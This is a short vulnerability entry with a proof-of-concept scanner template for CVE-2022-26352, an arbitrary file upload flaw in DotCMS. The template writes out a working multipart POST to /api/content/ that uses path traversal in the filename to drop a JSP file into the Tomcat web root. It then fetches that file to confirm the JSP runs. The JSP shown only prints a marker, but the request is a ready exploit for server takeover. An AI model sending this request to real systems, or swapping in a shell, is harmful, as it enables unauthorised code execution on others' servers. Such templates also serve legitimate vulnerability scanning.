漏洞描述
There is an arbitrary file upload vulnerability in the /api/content/ path of the DotCMS management system, and attackers can upload malicious Trojans to obtain server permissions. app="DotCMS"
CVE-2022-26352: DotCMS Arbitrary File Upload
PoC代码[已公开]
id: CVE-2022-26352
info:
name: DotCMS Arbitrary File Upload
author: h1ei1
severity: critical
verified: false
description: There is an arbitrary file upload vulnerability in the /api/content/ path of the DotCMS management system, and attackers can upload malicious Trojans to obtain server permissions. app="DotCMS"
reference:
- https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
- https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
set:
randstr: randomLowercase(20)
md5str: md5(randstr)
filename: randomInt(100000000000, 999999999999)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /api/content/
headers:
Content-Type: multipart/form-data; boundary=------------------------WebKitFormBoundary{{rboundary}}
body: "\
--------------------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{filename}}.jsp\"\r\n\
Content-Type: text/plain\r\n\
\r\n\
<%\r\n\
out.println(\"{{md5str}}\");%>\r\n\
--------------------------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: true
r1:
request:
method: GET
path: /{{filename}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()